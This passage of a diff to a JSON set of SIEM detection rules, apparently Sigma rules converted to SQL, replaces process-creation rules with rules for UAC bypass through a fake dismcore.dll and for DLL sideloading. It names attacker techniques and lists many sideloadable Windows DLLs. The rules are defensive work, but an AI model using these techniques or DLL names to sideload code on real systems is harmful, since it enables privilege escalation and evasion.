LIKE 
'%\\\\clr.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "image_load_office_dotnet_clr_dll_load.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Other scripts" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", - "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "status": "experimental", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. 
Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. 
For example 'enable' or 'disable' accounts or change the password...etc", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' 
ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE 